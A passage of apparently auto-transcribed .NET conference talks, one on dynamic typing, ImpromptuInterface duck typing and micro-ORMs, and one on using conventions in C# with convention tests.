valid. And then we go ahead and make ourselves an anonymous type that has all of the things that discount is expecting. So these don't have to be dynamic things. It doesn't have to be dynamic XML or any of that. It can just be a normal.NET object. This is just a kind of standard parameter object pattern. So we pass in, it has an ID, a code, et cetera. We pass that into new discount, and then I just don't find a dump extension method that runs that discount up against some sample orders. So we run this and we see, hey, discount two is valid for in order with two items, but is not valid for in order with seven or 10 items. So just to prove, I mean, I hope you trust me, but just to prove that it's actually working, so now it's valid for 10 items instead of two. I think this is pretty neat. I work in e-commerce. I'd like to be able to not have my discount rules hard coded into our normal.NET side of the app. So if we can make those rules a little bit more flexible, make them more dynamic, what's not to like? So that's just for a single discount. So now, showing that it works for our just kind of statically manipulated XML library. So we've got an all discount, the none discount, the big, none is valid for nothing, big is valid for greater than five. So everything works there. Now we can run the same using our dynamic XML repository. Ta-da. Come on, no applause. Oh, come on, you can do better than that. So that's just treating everything as dynamic here. So what concerns me is that in discount, everything is dynamic. So discount is basically a low level domain kind of concept. And I'm not really comfortable having dynamic seep all the way down in there. All right, true. We'll take that there's dynamic stuff involved with the Python and Ruby, but I'd really like to have discount depend on something concrete instead. So what if we could come in here instead and say, all right. Now we'll just go ahead and leave that existing overload. I always say overlord. I don't know what that says about me. So let's instead say that discount takes an I discount definition, which just happens to be defined as matching the contract that we're expecting. So now, and I'm just going to leave the dynamic version in here because it's relied on elsewhere in the code. So now we can essentially say, all right, discount of dynamic is actually, huh. Okay. I've never actually tried doing it that way. All right, so we'll just do it a different way instead. All right, so let's just replace the dynamic constructor with the I discount definition. So now if we compile, we would expect that it's going to blow up. Excuse me, because there are a couple of places that we use that we use it dynamically. So here we could say, all right, so let's make this a say var and then act like is an extension method. So if, you know, so this is a statically typed thing. It just happens to be an anonymous object. So it doesn't have a type that we can name, but we can still say, hey, you should act like a discount definition and then pass that into discount. So that's one option. So now we've got real, real duck typing. You give me a something and I'll just say treat it as an enumerable. Even if it doesn't implement I enumerable of T, if it has a method that says, get me an enumerator, we're good enough. All right, so that fixes that case. In our XML repository here, let's do the same thing act like I discount definition, pull that in. There's going to be one in our dynamic. So this dot as dynamic dot act like I discount definition. Oh, haha. So you can't use extension methods when it's dynamic. So let's instead say impromptu interface impromptu dot act like excuse my Vimfoo here. Not meaning it to be distracting. All right, so we actually have to do a, I'll just import that to make it smaller. All right, so now we're saying make me a discount with our dynamic XML here. Acting like an I discount definition. So because it's dynamic, we can't use extension methods. We just call it impromptu act like instead. And now let's just go quickly fix up. We can get something by code in our massive example, which we'll talk about later. Act like I discount definition. And then finally, oh hey, it succeeded. All right, so now if we flip back to our program, we can run this. And we'll see that indeed, you know, so now our domain model doesn't have any notion that we're using dynamic stuff out, you know, kind of behind the scenes. It just knows that I got a discount definition. Now we're taking this dynamic data access stuff, avoiding all the tedious mapping from strings and casting and elements versus attributes. I mean our dynamic XML element here, we could make that smarter. We could say, all right, first check if there's an attribute. If there's not an attribute, then check if there's an element. Oh hey, there are more than one elements. Let's return something that will either behave as one if you cast it as a string and into a string or it can behave as a collection if we want it to. So this is just smarter casting and smarter implementations of that get member and that kind of thing. All right, so this is just scratching the surface. There's actually a project out on GitHub that I started and have completely abandoned, but I'm still interested in if anyone wants to help. I just called it DNXML or something like that to essentially try and make a smarter version of this dynamic X element. So we'll say, hey, check here an attribute, check for an element, et cetera. So again, our domain model now doesn't have this notion of a discount definition. We just say, regardless of what you feed me, I just need to know how to build myself. Yes, sir? What do you use acts like if you get the exception straight away, it doesn't even recognize the use? That's a good question. So the question was, when you're using act like, if it doesn't fulfill the contract, what happens? I have no idea. All right, so there are two ways that it could fail. Either we've got extra functionality. Well, we've already seen that because I greet. We had a greet method, but there was other stuff and we just kind of ignored that. So the real question is what happens if we just don't have an ID? We're saying, here's some discount parameters, have it act like a discount definition. Boom. All right. So the runtime binder. Okay, so I'm going to delete a different one because I don't think it was impromptu interface blowing up. Maybe it is. All right, so get expiration. Oh, okay. Okay, yeah. So the answer is, here let me pull that up again. So the exception that we're getting is that our anonymous type of int string, string, string does not contain a definition for expiration date. So behind the scenes impromptu interface is just saying, all right, you said that you are a discount definition. So I'm just going to spit out the call site caching, all that call site stuff. That's essentially what impromptu interface is spitting out behind the scenes. So it's turning your request for expiration date into a request for expiration date from the object that you passed in. So then the runtime says, all right, well, you said that you could handle this, but you clearly can't. Liar. So testing is the answer. But yeah, good question. Any other questions? Follow-up question? Yes, sir. Yeah, absolutely. So the question was, so if you have to inherit from a base class that should have implemented an interface but didn't. So suppose that I have something that it has an add and a remove, and it implements I enumerable, but it doesn't implement I collection. And we want to treat it as an I collection because it can do everything a collection can do. It just doesn't have it. Yeah, you can absolutely say, act like an I collection. And it just goes. Which is pretty neat. Or something that doesn't implement I enumerable. If you had to get enumerator. I'm not sure why you would do one without the other. But that's the sort of stuff that this enables. I don't know. This stuff is, there are a lot of use cases that we're not going to be able to touch on here. I think it's pretty darn interesting. Any other questions about what we've seen so far? Yes, sir. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yeah. So the point that was made is that if, you know, so here we're using expiration date. It only fails when we try to use expiration date. So if we come over to our discount and just get rid of that line, now we can flip back to the program and I expect this will pass. Because even though we said act like a discount definition, we never used a part of you that's missing. So I mean, so you could just say, all right, well, make an interface for identifiable that just assumes you have an ID that returns an integer. Regardless of the rest of the stuff, now we've got something that's identifiable and we can write functionality that uses that one assumption even if we don't have anything that explicitly implements identifiable. So an obvious next question is what about performance? So this is where all that call site caching and whatnot comes in. These are native.net objects. So this is a very quick decision for the runtime here to say, hey, do you have an expiration date? Yeah, it turns out you do. Cool. And it just goes on its merry way. And it remembers how it resolved that in the first place so that the next time it doesn't have to go and look it up again. It just says, this is probably a.net object, a CLR object. So I'll try that. That fails, then it'll fall back and use smarter logic. Yeah? Okay, so we've looked at dynamic XML. We've looked at pulling that in. We've got the interop with Python and Ruby. So what about other data sources? So XML is all well and good, but most of your stuff is probably in SQL or a no-RM kind of data store. So starting with webmatrix.data, which is a project that Microsoft included in Web Matrix, why they included it in Web Matrix, I'm not really sure. It's kind of a neat standalone thing. So they implemented the idea that you can just say, give me a SQL query and I'll return you a dynamic, or a list of dynamics, an Ionium or both dynamic, that exposes essentially your data records, but handles all the casting and everything for you. So they went ahead and implemented that and consuming that looks like this. So if we wanted to say, get a discount given a code, so we could say select the top one from discounts where the code equals blah, does support parameterized SQL, so we just pass in now query single. Here's the SQL, here's the code, that's the one parameter that we passed in, and then out we get a dynamic result. Oh, hey, this is going to fail because we need an act like. Let's see it fail first. Just for, actually no, this won't fail. Well, we're not even going to exercise this, but this is how this, so this is, I apologize, I'm a little confused. So this is kind of what it looks like to consume the web matrix stuff. So querying out a single record, querying out multiple records, and then the result here is just, so query returns an Ionium or a bulk of dynamic, and then we say take each of those and return me a new discount. So we can, I think that was right, the matrix discounts. So if we try running this, it should fail. Ah, best overload didn't match. But note that's a runtime error because it's a dynamic expression and not. So here we can say impromptu, act like, I discount definition, and then now we pass in a row. Now that's going to work. All right, so now, no hand waving. This is a completely separate data store. We've got a database that has, and even it has an odd discount in it. And so we pull it out and it's got the Python and you'll, you know, indeed the logic is correct. We can actually even then go and test, you know, these library support wrapping as well. So in web matrix, in web matrix dot data, this is how you might do an insert kind of method. So we've got a save, we've got our query, insert into discounts with code, validation script, et cetera. And then we pass in the values. So we cast our code as a string, we cast our validation script as a string. Oh, that's because save here is dynamic. What if, because that could really be a discount definition. Now we've got to go update our idiscount writer, idiscount definition. So now we don't need any of the casting because we know the type of the thing. And yeah, regardless, you know, so now if I come over into my program and I try act like an idiscount definition and it blew up. Oh, that's because our other repositories do not implement saving. All right, so there's that. And what was the last one? If you haven't guessed, we're also going to look at a couple other ORM type solutions. All right, so there's save that also has an idiscount definition. All right, cool. So we come back to our program. We run this. All right, that says that it passed. It didn't actually output anything. So now if I come up here and look at our web matrix data, we should see now that there's a seven discount that's been added that says it's valid if it's seven and otherwise not. All right, so we can use this to dynamically pull records out to dynamically push records in. Let's take a closer look at the way that we were actually doing that, that insertion with web matrix here. Well so this isn't particularly interesting because we actually have to enumerate out the parameters. So web matrix is one option. Well when web matrix was released, there was some people, I guess, kind of disagreed. First problem, the posts they put out didn't use parameterized SQL, it used string concatenation. Apparently they were targeting the PHP audience. So some people said, this is not what we want. So a couple people said, we're going to make our own. One of those was Rob Connery, he made a project called Massive. Interestingly Massive was distributed as a C-sharp file, not a DLL. So Massive is just a file that you bring into your project and it says, all right, well I live in my own massive namespace and then it provides just a whole bunch of extension methods and things that provide your ORM access. So if we look at our Massive repository, this is what that looks like. So in Massive, you're going to inherit from the Massive provided dynamic model, which essentially represents a table. So we've got discounts, which inherits from dynamic model. Dynamic demo is the name of the connection string. We say the primary key field is ID. That's how it can easily access single things. And then consuming it looks like this. So we make ourself a new discounts, which is this dynamic object. So now var, or wait, no. Okay, yeah, no, it's not dynamic. I'm thinking of something different. So we make a discount. Discounts has an all method. And then, interesting, we don't do full SQL here. We just use named parameters to say, all right, well, the where clause should be where the code is the code that we expect. The args are going to be code. The limit is one. And then we pull out that result and have it act like a discount definition. So that's the Massive approach to things. If we want to just select all of my discounts, that's how that would work. Saving, here we don't have to do as much. I wonder, can we just do, yeah, so what I'm thinking is we can probably just pass in discount now because it's strongly typed. If you passed in the dynamic, there was some weirdness because it couldn't detect the types or something. I don't know. Anyway, so that's Massive. Another example is Dapper from the guys at Stack Overflow. Dapper does less for you. It assumes that you want to manage your connections and that kind of thing. But given an open connection, it gives you extension methods that make querying return dynamic stuff. So we have a get all. We do a query, select star from discounts, and then that just returns an innumerable of dynamic that is going to fail when we run it. Prompt to interface of a row. So now if we run the Dapper version, Mountain really know why I'm running all of these because the result is the same. I guess just to prove that I'm not messing with you. Our seven went away. Why did our seven went away? Let's put it back. Now let's try this again. Okay, something probably with the compact SQL. So there are different, so Dapper, there's a simple.data, which is the one that I was thinking of where it actually, you make a new dynamic thing and then that is your, so essentially we would do something like discounts.database.discounts, and so it just infers the name of the table from how you access it there.all.find, that kind of thing. So simple.data, massive, Dapper. Find one that works for you. There are dozens of them. Dozens is probably exaggerating. There are probably almost a dozen by now. So find one that you think is interesting, useful, et cetera. So any questions about the data access stuff? So this is the sort of tedious mapping that dynamic can allow you to avoid. You'll notice nowhere in here are we saying what type are these columns or any of that. It just figures it out for you. You ask me for an int, so I gave you an int. That alone is some pretty severe savings. Combine that with the ability to say, all right, now we pulled it out. Here's an interface. There's no explicit mapping. Just you gave me stuff, now treat as a discount definition, and now you're statically typed all the way down. Yeah? So any other questions? All right, one more example for you. So I'm big into functional programming, F sharp enthusiast, all that sort of stuff. So currying is an idea that functional programming languages essentially represent methods that take in a series of things. Internally, they're represented as functions that take one argument and return a function that takes the rest of the arguments. So if I take three parameters and you give me one of them, I say, all right, well, I have one, now give me the other two. So it returns a function that says give me two arguments and I'll give you the result. So currying is built into functional languages. So I was thinking dynamic could probably support that. If we just say, all right, basically wrap my thing in a courier. Courier, huh. So wrap my thing in a dynamic courier and now let me use the methods on that dynamically. And if I don't pass in enough arguments, just return me something that says give me the rest. So I was thinking this and then I noticed that impromptu interface already did it, which is kind of neat. So this is what currying can look like. So currying works best if you give it an explicit delegate instead of like a method group. So here we're just giving ourselves essentially a method called logger that given a file, a line number and an error, we're going to just write that out to the console. There's an error in this file online and here's the message. So given this logger, this is what currying looks like in static languages. We actually, well in C sharp. So we actually have to explicitly break out that curried is a function that takes a string that returns a function that takes an, that returns an action that takes a string. And that means that it returns void. And so then we break out here's the F, here's the L, here's the E. Once I have all three, return my result. So we can say, all right, error in program here and now that's a curried program.cs. So now program.cs as a file should be shared between line 12 invalid syntax and line 16 missing return. Indeed, program.cs now is shared. We've got line 12, we've got line 16. All right, so that's the static version, very awkward. They have to call it one parameter at a time, just not fun. I don't recommend doing it. Now dynamically we can just say impromptu.curry. And impromptu.curry says, all right, well, and so this just returns a dynamic. That dynamic happens to be a function that can be executed, that can be invoked with any number of arguments. So we say, all right, curry me with program.cs. Now pass in 12, then pass in invalid syntax, or pass in 16 and missing return statement all together. Regardless, it says, all right, once I get to three arguments, I'm good and it returns the result. Ta-da. So I'm not sure how practical this is. I've never actually needed to use this. But it's just one more interesting way that, you know, one dynamic, when objects aren't necessarily all that they appear. There are a lot of interesting things between duck typing and all that. So hopefully I've piqued your interest enough that you'll take a look at these projects. So again, here's that link. Most of them are available on NuGet. And then this presentation with all the code is up on GitHub, if you're interested there. If you do anything interesting with this, please let me know. Impromptu interface actually started from a guy that saw this talk like three years ago. So thanks for coming. And if you have any questions, I'll be around afterwards. Thank you. I recently discovered that a lot of developed appsscreams. I did that because I was yeah I was in a project when all the ties were sealed. you you you you you you you you you you you you you you you you
|
It's been a few years since dynamic .NET went mainstream with the promotion of the Dynamic Language Runtime into .NET 4, but it's still largely viewed as a fringe technology. This session aims to change that by reviewing what the DLR is, diving into how it works with C# 4 and Visual Basic 10, and looking at some interesting applications of dynamic typing in static languages. In particular we'll discuss C# interop with IronPython and IronRuby; simplified data access through micro-ORMs like Simple.Data and Massive; and static duck typing with ImpromptuInterface.
|
10.5446/50979 (DOI)
|
So, this is a talk about my experience using conventions in C-sharp. I'm going to talk about how I use conventions, what problems I faced when I use conventions in C-sharp and how I overcome those problems. This is obviously not the only way of handling those problems, but hopefully you'll find it useful. It will be slightly more theoretical at the beginning, but bear with me, it will be more hands-on in the second part. My name is Krzysztof Kozhmic, and I'm a consultant. I work for a company called Redify down in Australia. This is my day job. When I come back home, I keep writing code. Some of you may know me for my contributions to Castle Project. Are there any Windsor users in the audience? Wow, cool. Yeah, so I've been responsible for what's been happening to Windsor over the last three years now, since I think 2009. I also have some other open source projects on GitHub under my own umbrella. I will mention two of them today. Slides from this talk and the demo will also be available on GitHub. I have a blog. I'm on Twitter. I actually prepared a custom T-shirt with my Twitter handle here so that it's easier for people to recognize me, but I will hide it because I learned that yesterday they changed the logo. So now it's a retro T-shirt. Okay, so this is what I do. When it comes to how I do it, the approach that I like is something called zero friction development. Is anyone familiar with that term? Right, a few people. This is something that I think Oren Inie, I and I came up with in 2008. What it basically means is an approach of removing all of the mundane and boring and not interesting things that slow us down as we provide value in our software. In a way, this is the lean tenant of eliminate waste applied to the act of creation of software. During my work at different clients at Redify and while helping people on Stack Overflow or on Castle User Group with the problems that they are facing, I noticed that very often the problem that they have is related to friction. One thing that I know from experience that is very good at eliminating the friction is the best one that I found so far is introducing conventions to the code base. There are many definitions and the one that I like is this. The convention is an agreed upon approach to carrying out a particular set of tasks. So this is like driving a car. Whether you have a Toyota, a Ford or a Saab, if you have every car will have a steering wheel and the steering wheel will work pretty much the same. You turn it right, the car turns right, you turn it left, the car turns left in every single car. It's a convention that when you stop at the light, you stop at the red light and you go on the green light. It's a very useful convention. You would probably not want to keep driving when the light is red unless you are crazy, right? Twitter is even a better example of that because it's more recent. Who's on Twitter? Obviously, everyone. If you remember back to ancient days, like 2007, things like mentions, things like hashtags or retweets, they didn't exist as an explicit concept. You couldn't click them like you can in here. If you called Twitter API, you wouldn't get a collection of people that were mentioned in a tweet or hashtags that were mentioned in a tweet. This is something that people just were doing to solve the problems they were having. I want to tweet something and this is with relation to someone. How do I do that? I put an add sign and I put the Twitter handle of that person. Done. I tweet something and it's with relation to something. For example, a conference. Well then I put a hashtag and some unique, hopefully relatively unique word to mean what I want to say. Then Twitter, the company, they saw that this is something that people are doing. People take value from it. They took it and made it an explicit concept in their system to enrich the experience that we are having on Twitter. You can do something similar for your development team by introducing conventions to your code base. Very often, however, we are faced with an approach like this. If we are working with C sharp, C sharp is a really nice language but people tend to have the problem that we won't be using this because it is not compile time save. We won't be using conventions because by definition, because this is an agreed upon approach that we as a team, not the C sharp development team, decide to follow, this is something that the C sharp compiler doesn't know about so it will not be able to validate it. C sharp is a really nice language. It's a general purpose, strongly typed language and statically typed language. It has certain interesting characteristics. The strongly part means that the types that we create in the language don't change. If I have a class called customer, it has a method called pay and it has a property called name, after I have compiled the code, the class will not change. It will not get a new property. It will not get new methods. The method will not change its signature and it will not suddenly become static or abstract. The property will not change its type and suddenly name will become an int. The statically typed means that all of those things, the types and the names of everything are determined during the compilation time and checked during compilation time. Some of them are also checked at runtime. This is great. I love C sharp. It allows for very nice tooling to exist to aid us in development. Because I use a type that's in an existing assembly and the tooling knows that this type has certain set of methods or properties and it will not gain new ones or they will not change where I mistyped something and I typed something that it doesn't know about. It knows that it's an error. It can tell me very quickly as soon as I type it, hey, this method does not exist on this type. The tooling can inspect the metadata about those types and can provide me with help while I write my code. We get intelligence from that. We can also see documentation. Tick typing allows for very smart refactoring support. Because we've got all of that metadata about this type, the tool can look at what types I have in my system, how I'm using those types and if I want to rename something, it can very smartly rename just the right things for me. We tend to rely on the compiler to tell us when we have problems with our code. When I have a type and I try to assign a property that doesn't exist, this code will not compile. And we rely on this. How many of you have written a code, made a change and then hit control shift B to then see that fail and then went over every single place that failed to fix it? Right? Pretty much everyone. But the problem happens when we rely on the compiler too much. And people feel very uneasy when they see code like that. And I'm using dynamic as an example. But if you think back, even when C sharp 3 came out and the var keyword was introduced, do you remember the flame words that were happening on blogs and forums? Oh, var is so bad, it makes my code unreadable. It's not dynamic, I cannot validate it. Right? Obviously not. But the mere thought of there is something that the compiler will not be able to check. It freaks people out and the same thing happens for conventions. Like I said, by definition, they will not be checked by the compiler. It makes people uneasy. They push back. We will not be using conventions because of that. But what we have to realize is that there is no way to write a non-trivial program that will be fully validated by the compiler. Let's take this piece of code as an example. This is from a real app that I was working at. Well, this is a simplified version of that. And this is the same problem that I was facing there. This is for a client that was in a regulated industry. Certain actions in the system had to be audited. And then we needed to show this audit in the audit UI. So we had a hierarchy of classes, audited action classes. There was the base audited action class and inherited audited actions for every action that was being audited in the system. And then we had a corresponding hierarchy of DTOs. The problem here is, how do we take those audited actions and then convert them to DTO so that we can display them in the UI? And this is one way of doing it. We get all the audited actions and then we interrogate them. Hey, are you a disconcrete type? No, I'm not. Well, then maybe you're a disconcrete type. Well, not really. Oh, maybe this one. Well, actually I am. Okay. Then I will create a corresponding audit deduction DTO. I will downcast you to your real type and I will copy this property to DTO, that property to DTO, and then add the DTO to the collection and then move on to the next one. So the rule here is that we need that if for every single concrete audit deduction type. But if you forget to add it for one, will the code compile? Well, obviously it will. Will it work? Well, it, I guess, depends on your definition of work. Depending on what's at the end of this for each loop, it may either fail at runtime, give you an exception and embarrass you during the demo, or it may not fail and then the audit deduction will just not appear in the UI and then you may find for that because as much as the auditor is concerned, well, your code is not auditing this thing and it should have. And this is because Cshab is a general purpose language. It has a general purpose compiler. It does not know about those rules that you have in your system. So why don't we just forget about it for a moment? Why don't we just let go of this thing that the compiler can help us? Let's forget about the compiler. Let it sink in for a moment. We'll just put the compiler away and forget that the compiler does any validation because it actually doesn't do it as its primary purpose. The primary purpose of the compiler is take your Cshab code and do two things with it. Generate IEL and generate a set of metadata about all the types that you have in your system. And as it goes through that and it sees something that it doesn't like and that doesn't know what to do with it, then it delegates to you, hey, there's something I don't like. I don't know what to do with it. Fix it. And then we have compilation errors. But that's not the primary purpose of the compiler. So let's not over rely on it, okay? And then let's step back and try to rethink how we use conventions and how perhaps using conventions can help us in this scenario. And this actually already is a convention, if you think about it. It is an agreed upon approach to solving a particular problem. We've got set of audit actions. We need to convert them to DTO so that they can be displayed in DOI, right? It clearly is one agreed upon way of doing that with those EFs and add DTO methods, right? It's just not a very good convention. Why is it not a very good convention? Well, first of all, this code is horribly, horribly boring to write. How many of you attended HADDIS session in the morning today? Right? So who was talking about it? We are not becoming developers to write this sort of code. Would you be excited if you were waking up in the morning thinking, wow, I'm going to write some EFs and some add DTO methods and some mapping code? Wow, this is so awesome, right? We don't do that. You don't need a developer to write it for you. You need a typist, someone who can type. You can explain it to a child who doesn't know C-sharp or to somebody, not necessarily a child. I'm not advocating child labor, by the way. But you can explain it to someone who doesn't know C-sharp because not a developer, and they will be able to do it because the algorithm for doing that is very simple. Let's look at another example. This is from the same system. We had a set of reports that we needed to render and display to our users. So we take a report from the database, an instance of a report class, and then we need to locate a corresponding RPT file, a crystal reports template file for it. And then we render it. So how do we approach this problem? How do we locate the template knowing that we have a given report? And the path to that file looks something like that. It's on the server, and then basically we as a development team had the liberty of where we want to put those files. The server would be changing between different environments, but it was completely up to us on how we structured that. So we can approach it in a very similar way like with the previous example. We can hard code all of the mapping between the report, say, based on ID and the path, and then just randomly put all those files somewhere. If you are smart, we'll probably put it in the config file because this is cool, and then we can change it between different environments. But this is, again, us doing the job. This is a convention in a way. It's a convention that says we locate RPT files for reports because we look them up in the config. But this is, again, a convention that we are doing the job. So why not turn it around and devise a convention that will do the work for us? And this is what we did. This is how we implemented that method. That based on information from the report, we devised the rule that we'll use information from the report to create a path, and this is where we are going to put the file, and we will consistently follow it for every report. And then with this small piece of code, given the report, we can reconstruct what the path is without having it hard-coded. Notice how much different this code is from the previous example. It's so much simpler. Again, even if you're not a developer, you could probably understand what it's doing, right? It's so much less code. There's so much less glue code, all those ifs and curly braces and semicolons and everything. And one other important point, it doesn't use a framework. When people think about conventions, they often think in terms of frameworks. I'm using a framework. The framework forces me to use conventions, therefore I use conventions, but this is not necessarily how it has to happen. Don't constrain yourself artificially to using conventions only when you are dealing with a framework. If you were actually to introduce a framework here, we could not, I don't think we could easily make this code simpler. It would probably only make it harder to read and harder to maintain. This is as simple as it gets. And I'm not saying that you shouldn't be using frameworks. A well-designed framework, framework designed with conventions in mind, can really help you limit the number of lines of code that you are writing and can really simplify your architecture very nicely. WCF is a really nice example of the opposite, really. This is how many of you have seen services like that, right? If you go to MSDN or surgeon blogs on how to apply behaviors to WCF services, this is what you are going to get. And this is what we are following on the same project. We needed services, we needed to apply some behaviors to them. So well, that's what we did. We followed what MSDN says, what the blog says. And we needed a behavior. Well, let's put an attribute there. We need another one. There is another attribute for that. We need a behavior on an operation. Well, put it on the method, right? And we had plenty of services and each of them because we were consistently applying the same set of behaviors. This was our convention. Every single service looked like that. If we needed to add a new service, you would find an old one, copy paste all the attributes and then we would be done, right? And I'm not, this is just one part of it. I'm not showing you everything because let's not forget about the XML configuration, all of the ABCs, address, binding, contract, all of the other things you put in XML. And this was hosted in IAS, so we also needed the SVC file for it for every single service that we had. So this is obviously not pretty, right? And you would think there has to be a way to do it better. There has to be a tool that would allow us to apply the same behaviors and configure the same services in a simpler way without us doing the job again, but the tool doing the job for us. And this is what we did. We started using Windsor's WCF facility. And then in this small amount of code, we were able to register all of our services in the IOC container. And then because WCF facility is a tool specifically designed to configure your WCF services by convention with a small amount of code, with this configure method, we were able to say, those are my WCF services. And configure them in this way, make them hosted in IAS, open them eagerly, publish, make some point and all the other things. And this single piece of code was responsible for registering all of our services, applying all of the behaviors to them. The only thing that we needed to add on top of that was a few lines in our global file so that we didn't have to have SVC files. We were using routing instead to expose the WCF services. Now I will share a secret with you. We did that only after nine months of development. For the first nine months, we were doing the other thing with the attributes, I was like XML. And why we did that has to do with this graph. This is the graph that shows us on the x-axis the size of the problem that we're dealing with. In this case, this is the amount of WCF services that we have. And on the y-axis, the amount of code that we write to support this problem. And the red line is how much code we have if we hard-code all of that with the attributes. And the blue line is amount of code that we have when we have automated convention. And the important bit is the lower left corner. This is when you have a very small number of your services, probably one. Because when you do that, it's actually less code or can be less code to register things by hand like that, to expose, to add the behaviors by just slamming in an attribute. It's less code to just put an attribute than it is to write that installer that I just shown you. But by doing that, you set up a precedent. Because then the next guy that comes along and wants to add another service or wants to add another behavior sees that code. And because we as developers generally tend to be nice people, we just follow what the other guy said. So we are just going to do the same thing. And then another behavior comes along and another service comes along. And very quickly, we are going to end up somewhere here. And only at this point did we realize, or maybe we actually realized this much sooner, but at this point we actually decided that we are going to change that. Why did we do it only then? Well, that's the human nature to first of all follow the established convention. And another one is that there's friction, there's a small amount of friction in actually having to go when re-architect all of the WCF services that we have. Although I must tell you that removing all of those attributes and all of that XML, specifically XML, and SVC files was really liberating and really nice. But this is obviously not the end of it. Because it's not just about having more code or less code. Another thing is that conventions are implicit. If you have WCF service with some attributes on it, by just looking at those WCF services, you see that those attributes are being applied to that, but that those behaviors are being applied to that WCF service. If you do it with WINS or WCF facility or any other tool like that, you don't see this. It's just a normal class. And you have to trust that those behaviors are going to be there at runtime. You do not see this. This is like standing on the glass floor. This is a picture from a building in Chicago, I think, from a balcony that has a glass floor. And then you look down and there is like 100 meters of nothing and a piece of concrete waiting for you. And I don't know about you, but this picture freaks me out. And this is what happens with people when you are using behaviors. They look at the service and there's nothing there. It's like here. I step out and there's nothing there. And I don't want to feel like Wiley Coyote from the Looney Tunes cartoons, right? That he always runs and runs and runs and there's nothing and he just looks at the camera and says, and then falls down, right? We don't want to feel like that. But this is the feeling that we always, often, not always. This is the feeling that we often get. So let's revisit that. Let's go back to the first example and how we can change that. So we can go and create and use a framework again in this case that would do the mapping. In this case, this is using Cartographer, which is a framework that I'm building, but you can just as well use any of the other frameworks like AutoMapper. So what it does is it says, well, I have the same audit actions. Now I will delegate to a tool to convert them to audit action DTOs. And the only thing we need to do in this case is there's an extension point called I type matcher that will be called down for every element in the collection and will be passed among other things, the actual concrete type of the audit action. And then using conventions based on the name, we find the corresponding DTO type. But it's obviously not immune to failure. Things can still go wrong. If I have an audit action, but I forgot about creating the DTO, well, I will get the failure at runtime still. So even though I have less code, it didn't really help me to avoid problems. Actually, it's still bad because we still have this glass floor, this thing that I don't really, I cannot really touch. There is an exception somewhere in this weird code that I don't really know what it's doing and the cause is far from the effect. It's far from the effect in terms of in time because it fails at runtime, but the cause of this is that when I created my audit action, possibly yesterday or a week ago, I forgot to create the audit action. And it's far in terms of code because it's failing somewhere in my audit service, but the reason for that is because in a different project, I forgot to put a class. So how do we solve that problem? Discipline. We will make developers remember every time you create audit action, create a DTO, solve. Right? Perfect. We can go home now. Well, not really. Well, obviously, this may kind of work if you have one convention, but you will never have just one. You will have plenty. So you will have the WCF services and behaviors and you will have the RPT files and you will have the reports and plenty, plenty of others. And human brain has only certain capacities, so we will obviously not be able to remember everything. Well, then there's a better solution. Let's create the wiki and put it in SharePoint and make people remember to read it. Right? Who has seen projects like that? Obviously. Yes. Well, again, the same problem. It may help you to a point, but then you have to remember that there is something that you are supposed to read and where it is. Right? So, again, there's the problem that we are forced to do the work. We are forced to remember. We are forced to go and look and find something in SharePoint and find the wiki and read it, which may also be a problem in itself and understand it. So we need more visibility. This is the problem. This is the real underlying problem with using conventions in those scenarios. That the convention is doing something, but we don't really know what it's doing, why it's doing it, when it's doing it. So, how can we raise the visibility? How can we remove the glass floor? Well, one way of doing that, that most tools and most teams that I've worked with are doing is we need something tangible to begin with. If we want to go and look at those conventions and be able to see if they are being applied correctly, if they are being applied at all, and what they are doing, we need something tangible. So, let's turn to the C-sharp language, to the starting nature of C-sharp and remember that it creates the IL, the C-sharp compiler creates the IL when it generates, but it also creates a set of very rich set of metadata about those types and about relationships between those types. And we have API to do that. It's called reflection. So why don't we structure conventions in a way that makes it easy for us to inspect the things that we care about using reflection? So, I'm sure most of you are familiar with this example. This is WCF, this is ASP.NET MVC, and it has convention like that. It uses base type or actually an interface to find types that it cares about. It cares about controllers, and a controller is the type that implements an eye controller. We can very easily inspect those sorts of things with reflection. We can use generics. We can say that type that is data source for my monthly revenue per client report is type that implements eye report data source of this report. Again, something that can be easily checked with reflection. We can use custom attributes. This is what WCF does to denote the contracts, or this is what MEP is doing. We can use the name. This is what we did with the auditid actions. Based on the name, naming convention, we match one type to the other. You can even use location. If there are types that don't really have that much in common with each other, just put them, but they serve the same role or similar role in the system. Maybe put them in the same namespace. Where are we going to do that? Where are we going to do that reflection thing magic to inspect those things? First of all, what we care about is we care about very short feedback cycle. We want to have a similar experience to just writing a piece of code, clicking control shift B, and then the compiler doesn't compile. We want to have a similar experience for this. We want a similar experience for our conventions. Well, you have an auditid action, but there's the O missing. Would you like me to help you with that? How can you do that? One way of doing that is, okay, let me step back. How many of you write tests? Right. Pretty much everyone. If everyone writes tests and tests run right after we compile the code, hopefully, before we commit, hopefully, again, why not use the tooling that we have for testing? We usually have rich ID integration. We have tools that run the tests. Some of us use tools that run the tests continuously in the background. Why not leverage that to run our conventions? Why not use testing frameworks to not really run tests that validate the logic and behavior of our system, but also write tests that validate the structure of our system? Why not leverage the unit testing or other testing framework that we are using to do that work for us so that we get a very short feedback cycle and we get a really nice experience and really nice visuals to the integration? Now I'm going to show you how we did that. We don't really have that much time. Perhaps instead of writing this, I will just do the shorter version and show you the final version of what it looks like. First problem is where do we put them? Where do we put those tests? Some teams want to create a separate test project that has just conventions to make it explicitly separate. The approach that I take is generally I just have a convention folder in my test project where all my conventions are. The important bit is that you stay consistent. There are two roles that those tests are going to serve. First of all is tell you where the problems are and when you hit those problems. Second of all is serve as executable documentation, serve as replacement for that page in SharePoint. A very important thing is to install all of your Windows updates before you do the presentation. Another very important thing, even more important, is to make them as readable as possible so that when someone comes along, they can very easily look at your conventions and learn about what the conventions are, how your system is structured, and how it works. For that, based on the projects that I was working on, I have a small Nougat package which is called convention test. It says local here, but it is also available on Nougat. This is a very simple thing that doesn't have much behavior in it. All it does is it provides structure and plugs into any unit to allow me to quickly and simply write those tests. You want to make them as simple as possible because if you make them complicated, people will not write them. We really want to care about the experience that developers on the team have when writing those conventions. Also because they are supposed to be your executable documentation, they need to be very easy to read. This is a very simple package. It's code only, it's not a binary, and it pulls in some dependencies. You need wins or an approval test. I'll talk about this in a second. What it allows me to do is it allows me to write tests like this. First of all, this is how I name my tests. There's one test per class, and the way I structure them here, the way I name them is I want to give out what the convention is by just looking at the name of the test. You should be able to know what the conventions are just by looking at what the convention's classes I have in this folder. The way they are implemented is, for example, let's look at each audit deduction has a DTO. If I have this convention test base class here, this is what comes in the Nougat package. What it forces me to do is it's an abstract class, and what it forces me to do is it forces me to override this single method. This single method is just so that I return something called convention data, which specifies what my 